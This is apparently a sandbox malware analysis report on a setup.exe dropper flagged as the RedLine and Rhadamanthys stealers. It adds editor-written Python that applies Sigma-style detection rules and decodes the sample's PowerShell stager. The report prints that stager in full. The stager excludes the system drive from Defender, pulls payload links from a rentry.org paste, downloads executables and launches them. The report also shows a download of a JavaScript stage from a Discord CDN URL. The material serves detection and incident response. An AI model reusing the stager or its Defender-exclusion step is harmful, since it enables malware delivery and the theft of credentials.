Windows
Analysis Report
setup.exe
Overview
General Information
Detection
Babadeda, RHADAMANTHYS, RedLine
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Babadeda
Yara detected Powershell download and execute
Yara detected RHADAMANTHYS Stealer
Yara detected RedLine Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops large PE files
Encrypted powershell cmdline option found
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes or reads registry keys via WMI
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
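The Sigma detections in the list above are only named, not shown. As an added example, written by the editor and not taken from Joe Sandbox or from the published Sigma rule files, the Python below re-implements each of them as a simplified predicate over a process command line and runs them against the command lines from the process tree further down this report. The predicates are the editor's approximation of what each named rule looks for, not the rule text itself; a sixth check, marked extra, is not one of the page's detections and is included because the silent Node.js MSI install is what makes the later Electron/JavaScript stage possible. The command lines are copied from the tree; the `-EncodedCommand` blob is truncated to its first 64 characters and the Discord URL's query string is dropped, since only their shape matters to these rules.

```python
"""Sigma-style triage of the command lines in this report's process tree.

Added example (editor's own code, not Joe Sandbox's and not the Sigma
project's rule text). Each predicate is a simplified stand-in for the
detection of the same name in the signature list; the last one is extra.
"""
import re

# Constructed input: command lines copied from the process tree of this report.
# Index 1 keeps only the first 64 chars of the real -EncodedCommand blob;
# index 6 drops the query string of the real Discord CDN URL.
SAMPLE_CMDLINES = [
    r'"C:\Users\user\Desktop\setup.exe"',
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUA"',
    r'"C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\2030.tmp\2031.tmp\2032.bat C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exe"',
    "where node",
    r'''powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"''',
    "msiexec /i nodejs-installer.msi /quiet",
    r'''powershell -Command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1249192949389201463/1249192988895350794/index.js' -OutFile 'C:\Users\user\AppData\Local\Temp\chrome2\index.js'"''',
    r"cscript.exe //Nologo C:\Users\user\AppData\Local\Programs\Steam\resources\app.asar.unpacked\node_modules\regedit\vbs\regList.wsf A HKCU\Software\Valve\Steam",
]

PS_IMAGES = {"powershell", "powershell.exe", "pwsh", "pwsh.exe"}
SCRIPT_HOSTS = {"cmd.exe", "cscript.exe", "wscript.exe", "mshta.exe"}
B64_BLOB = r"[A-Za-z0-9+/]{40,}={0,2}"  # long enough to rule out flag values like 'Bypass'


def image_name(cmdline: str) -> str:
    """Lower-cased basename of the first (possibly quoted) token, e.g. 'powershell.exe'."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', cmdline)
    exe = (m.group(1) or m.group(2)) if m else ""
    return exe.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def outfile_target(cmdline: str) -> str:
    """Argument of -OutFile, unquoted, or '' when there is none."""
    m = re.search(r"""(?i)-OutFile\s+['"]?([^'"\s]+)""", cmdline)
    return m.group(1) if m else ""


def in_user_writable_dir(path: str) -> bool:
    return re.search(r"(?i)\\(AppData|Temp|Public|ProgramData)\\", path) is not None


def has_payload_ext(path: str) -> bool:
    return re.search(r"(?i)\.(exe|dll|msi|js|jse|vbs|wsf|bat|cmd|ps1)$", path) is not None


# (rule name as it appears in the signature list, predicate(image, cmdline))
RULES = [
    ("Suspicious Execution of Powershell with Base64",
     lambda img, cl: img in PS_IMAGES
     and re.search(r'(?i)\s-e[a-z]*\s+"?' + B64_BLOB, cl) is not None),  # -e, -enc, -EncodedCommand
    ("PowerShell Web Download",
     lambda img, cl: img in PS_IMAGES and re.search(
         r"(?i)Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|\bwget\b|\bcurl\b"
         r"|DownloadString|DownloadFile|Net\.WebClient", cl) is not None),
    ("Suspicious Invoke-WebRequest Execution",
     lambda img, cl: img in PS_IMAGES
     and re.search(r"(?i)Invoke-WebRequest|\biwr\b", cl) is not None
     and (in_user_writable_dir(outfile_target(cl)) or has_payload_ext(outfile_target(cl)))),
    ("Suspicious Script Execution From Temp Folder",
     lambda img, cl: img in SCRIPT_HOSTS and re.search(
         r'(?i)\\AppData\\Local\\Temp\\[^"\s]*\.(bat|cmd|vbs|js|jse|wsf|ps1)\b', cl) is not None),
    ("WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript",
     lambda img, cl: img in {"cscript.exe", "wscript.exe"}
     and re.search(r"(?i)\.(wsf|jse|js|vba|vbe)\b", cl) is not None),
    # Extra check, not one of the page's detections: a silent MSI install.
    ("(extra) Quiet msiexec package install",
     lambda img, cl: img in {"msiexec", "msiexec.exe"}
     and re.search(r"(?i)(^|\s)/(i|package)\s", cl) is not None
     and re.search(r"(?i)(^|\s)/q(n|b|uiet)?\b", cl) is not None),
]


def hits_for(cmdline: str) -> list[str]:
    """Names of the rules that fire on one command line, in RULES order."""
    img = image_name(cmdline)
    return [name for name, pred in RULES if pred(img, cmdline)]


def triage(cmdlines):
    return [(cl, hits_for(cl)) for cl in cmdlines]


if __name__ == "__main__":
    for cl, hits in triage(SAMPLE_CMDLINES):
        print(f"{image_name(cl):<16} {hits}")
```

Two things stand out when this runs. The two `Invoke-WebRequest` lines each fire twice (the generic web-download rule and the narrower one that needs `-OutFile` into a user-writable directory or a binary/script extension), while the `-EncodedCommand` line fires only the base64 rule: everything interesting, including the `Add-MpPreference` call, is inside the blob, so a pipeline has to decode the blob before string-matching it, which is what the "Powershell Base64 Encoded MpPreference Cmdlet" hit in the list above implies Joe Sandbox did.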
Classification
- System is w10x64
- setup.exe (PID: 7488 cmdline: "C:\Users\user\Desktop\setup.exe" MD5: B5E479D3926B22B59926050C29C4E761)
- powershell.exe (PID: 7548 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A" MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- okdtlfsk.k4u0.exe (PID: 4956 cmdline: "C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exe" MD5: CEE45150AF795124C072DDF8AB9EEE0E)
- conhost.exe (PID: 5312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- okdtlfsk.k4u1.exe (PID: 3168 cmdline: "C:\Users\user\AppData\Roaming\okdtlfsk.k4u1.exe" MD5: 448E72D5B4A0AB039607CBAF93707732)
- OpenWith.exe (PID: 7972 cmdline: "C:\Windows\system32\openwith.exe" MD5: 0ED31792A7FFF811883F80047CBCFC91)
- okdtlfsk.k4u2.exe (PID: 5844 cmdline: "C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exe" MD5: A3B2FCF0C05BB385115894D38C2E6C44)
- cmd.exe (PID: 7496 cmdline: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\2030.tmp\2031.tmp\2032.bat C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 7516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- where.exe (PID: 1196 cmdline: where node MD5: 3CF958B0F63FB1D74F7FCFE14B039A58)
- powershell.exe (PID: 4588 cmdline: powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'" MD5: 04029E121A0CFA5991749937DD22A1D9)
- msiexec.exe (PID: 732 cmdline: msiexec /i nodejs-installer.msi /quiet MD5: E5DA170027542E25EDE42FC54C929077)
- powershell.exe (PID: 7012 cmdline: powershell -Command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1249192949389201463/1249192988895350794/index.js?ex=666da961&is=666c57e1&hm=18936ed8d9532b88193b485814d4fae2181305431d8e870870aab77fc153e162&' -OutFile 'C:\Users\user\AppData\Local\Temp\chrome2\index.js'" MD5: 04029E121A0CFA5991749937DD22A1D9)
- okdtlfsk.k4u3.exe (PID: 6300 cmdline: "C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exe" MD5: 8578F7C0977818E0A940AB0B9F227B33)
- Steam.exe (PID: 5144 cmdline: "C:\Users\user\AppData\Local\Programs\Steam\Steam.exe" MD5: F040B4DE6F293D0B5B801A8E24CCA145)
- cscript.exe (PID: 4336 cmdline: cscript.exe MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)
- conhost.exe (PID: 2704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- Steam.exe (PID: 8108 cmdline: "C:\Users\user\AppData\Local\Programs\Steam\Steam.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\Steam" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1696,i,16557963471468826308,12020294816136511924,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1684 /prefetch:2 MD5: F040B4DE6F293D0B5B801A8E24CCA145)
- cscript.exe (PID: 7908 cmdline: cscript.exe //Nologo C:\Users\user\AppData\Local\Programs\Steam\resources\app.asar.unpacked\node_modules\regedit\vbs\regList.wsf A HKCU\Software\Valve\Steam MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)
- conhost.exe (PID: 4116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- Steam.exe (PID: 2344 cmdline: "C:\Users\user\AppData\Local\Programs\Steam\Steam.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\Steam" --field-trial-handle=2456,i,16557963471468826308,12020294816136511924,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2356 /prefetch:3 MD5: F040B4DE6F293D0B5B801A8E24CCA145)
- svchost.exe (PID: 5924 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- msiexec.exe (PID: 3588 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
- msiexec.exe (PID: 2852 cmdline: C:\Windows\System32\MsiExec.exe -Embedding 933007F3F47C18EFDBF07080B43D7822 MD5: E5DA170027542E25EDE42FC54C929077)
- msiexec.exe (PID: 7804 cmdline: C:\Windows\System32\MsiExec.exe -Embedding E900A4471D84F90E9185A9C7E4B35274 E Global\MSI0000 MD5: E5DA170027542E25EDE42FC54C929077)
- msiexec.exe (PID: 6724 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 3B1C8062EAD881799860A5FD745359D4 MD5: 9D09DC1EDA745A5F87553048E57620CF)
- cleanup
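The powershell.exe (PID 7548) entry in the tree above carries its script as `-EncodedCommand`, which is base64 over the UTF-16LE bytes of the script, and the decoded text is padded with `<#...#>` block comments between tokens; this is what the "Encrypted powershell cmdline option found" and "Powershell Base64 Encoded MpPreference Cmdlet" signatures key on. The Python below is an added example written by the editor, not Joe Sandbox output and not the malware's code: its only input is the base64 blob copied verbatim from that command line (the report wraps it every ten characters; the wrapping spaces are ignored). It decodes the blob, strips the comment padding and pulls out the indicators a responder needs: the Defender exclusion paths, the download URL, and where and under what names the payloads are dropped and started.

```python
"""Decode and de-obfuscate the -EncodedCommand blob from the process tree.

Added example (editor's own code; not Joe Sandbox output, not attacker code).
ENCODED_COMMAND is the blob from the powershell.exe (PID 7548) command line.
"""
import base64
import re

ENCODED_COMMAND = (
    "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA"
    "+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgB"
    "vAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA"
    "+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgB"
    "qAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgB"
    "rACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgA"
    "vAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB"
    "3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB"
    "0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgA"
    "gAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQB"
    "GAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAA"
    "kAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbAB"
    "vAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQB"
    "uAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARAB"
    "hAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAA"
    "kAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB"
    "3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATAB"
    "lAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQB"
    "GAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUAB"
    "hAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbAB"
    "kAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwA"
    "uAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
)


def decode_encoded_command(blob: str) -> str:
    """powershell -EncodedCommand (also -enc, -e) takes base64 of the script's UTF-16LE bytes."""
    raw = base64.b64decode("".join(blob.split()), validate=True)
    return raw.decode("utf-16-le")


BLOCK_COMMENT = re.compile(r"<#.*?#>", re.DOTALL)


def strip_block_comments(script: str) -> str:
    """Remove the <#xyz#> padding and collapse the double spaces it leaves.

    Fine for this sample; in general a '<#' inside a string literal would also
    be removed, so confirm the result still parses before relying on it.
    """
    return re.sub(r"[ \t]{2,}", " ", BLOCK_COMMENT.sub("", script)).strip()


URL = re.compile(r"https?://[^\s'\"()]+")


def extract_urls(script: str) -> list[str]:
    return sorted(set(URL.findall(script)))


def defender_exclusions(script: str) -> list[str]:
    """Paths passed to Add-/Set-MpPreference -ExclusionPath (Defender stops scanning them)."""
    m = re.search(r"(?i)(?:Add|Set)-MpPreference\s.*?-ExclusionPath\s+@\(([^)]*)\)", script)
    return [p.strip() for p in m.group(1).split(",")] if m else []


def drop_and_launch_points(script: str) -> dict:
    """Count the write and start statements and list the directories they target."""
    return {
        "download_calls": script.count(".DownloadFile("),
        "launch_calls": script.count("Start-Process "),
        "drop_dirs": sorted(set(re.findall(r"Join-Path -Path (\$env:\w+)", script))),
    }


# Decoded and de-obfuscated, the stager reads (line breaks added for readability):
#   Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force ;
#   $wc = (New-Object System.Net.WebClient);
#   $lnk = $wc.DownloadString('https://rentry.org/lem61111111111/raw').Split([string[]]"`r`n", [StringSplitOptions]::None);
#   $fn = [System.IO.Path]::GetRandomFileName();
#   for ($i=0; $i -lt $lnk.Length; $i++) { $wc.DownloadFile($lnk[$i], (Join-Path -Path $env:AppData -ChildPath ($fn + $i.ToString() + '.exe'))) };
#   for ($i=0; $i -lt $lnk.Length; $i++) { Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath ($fn + $i.ToString() + '.exe')) }

if __name__ == "__main__":
    script = strip_block_comments(decode_encoded_command(ENCODED_COMMAND))
    print(script)
    print("URLs:", extract_urls(script))
    print("Defender exclusions:", defender_exclusions(script))
    print(drop_and_launch_points(script))
```

The decoded script explains the rest of the tree. `[System.IO.Path]::GetRandomFileName()` returns an 8.3-style name such as `okdtlfsk.k4u`, and `$fn + $i + '.exe'` yields exactly the `okdtlfsk.k4u0.exe` to `okdtlfsk.k4u3.exe` processes listed above, so the rentry paste held four download URLs at analysis time. Excluding `$env:UserProfile` and `$env:SystemDrive` (normally `C:\`) from Defender before the downloads amounts to switching real-time scanning off for the whole drive, which is why the MpPreference Sigma rule is worth alerting on even when the rest of the command is not yet understood. Note that the rentry URL and the payload URLs behind it are attacker-controlled and can change between runs; the process tree, not the paste, is the reliable record of what ran here.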
Name | Description | Attribution
---|---|---
Babadeda | According to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers' analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines. | No Attribution
Rhadamanthys | According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies, it is designed to extract data from infected machines. At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine. |
RedLine Stealer | RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer. | No Attribution
No configs have been found
Rule | Description | Author
---|---|---
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
Rule | Description | Author
---|---|---
JoeSecurity_Babadeda | Yara detected Babadeda | Joe Security
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
Rule | Description | Author
---|---|---
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
System Summary
Author: Florian Roth (Nextron Systems)